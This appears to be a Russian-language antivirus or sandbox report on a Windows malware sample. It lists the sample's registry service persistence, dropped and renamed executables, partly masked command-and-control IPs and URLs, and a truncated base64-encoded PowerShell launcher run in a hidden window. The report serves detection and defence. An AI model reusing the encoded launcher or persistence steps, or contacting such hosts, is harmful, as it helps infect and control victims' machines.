Техническая информация
- [<HKLM>\System\CurrentControlSet\Services\msidcrl30] 'Start' = '00000002'
- [<HKLM>\System\CurrentControlSet\Services\msidcrl30] 'ImagePath' = '"<SYSTEM32>\msctfui\msidcrl30.exe"'
- 'msidcrl30' "<SYSTEM32>\msctfui\msidcrl30.exe"
- 'msidcrl30' <SYSTEM32>\msctfui\msidcrl30.exe
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNADcAYwByAGoAMAAxAD0AKAAoACcAWgB0AF8AJwArACcANAAnACkAKwAoACcANABoACcAKwAnAG8AJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAG4AdgA6AHQAZQBNAFAAXAB3AG8AcgBkAFwAMgAwAD...
- %TEMP%\word\2019\hh6t3if.exe
- <SYSTEM32>\msctfui\msidcrl30.exe
- %TEMP%\word\2019\hh6t3if.exe в <SYSTEM32>\msctfui\msidcrl30.exe
- '45.##.226.117':443
- '91.##1.54.71':8080
- http://ra###submit.com/search_test/hH5/
- http://45.##.226.117:443/L72APy6YaWpY/DauXfh/bZ2KkWPLUITUU/ via 45.##.226.117
- http://91.###.54.71:8080/ONJONuubvglz3L6NK/NlfF/kYj1ao1f8N4A41A/0InyAKFF8g/PjPTLE/nIn82fYisTp/ via 91.##1.54.71
- DNS ASK ra###submit.com
- '%TEMP%\word\2019\hh6t3if.exe'
- '<SYSTEM32>\msctfui\msidcrl30.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABNADcAYwByAGoAMAAxAD0AKAAoACcAWgB0AF8AJwArACcANAAnACkAKwAoACcANABoACcAKwAnAG8AJwApACkAOwAuACgAJwBuAGUAdwAnACsAJwAtAGkAdAAnACsAJwBlAG0AJwApACAAJABFAG4AdgA6AHQAZQBNAFAAXAB3AG8AcgBkAFwAMgAwAD...' (со скрытым окном)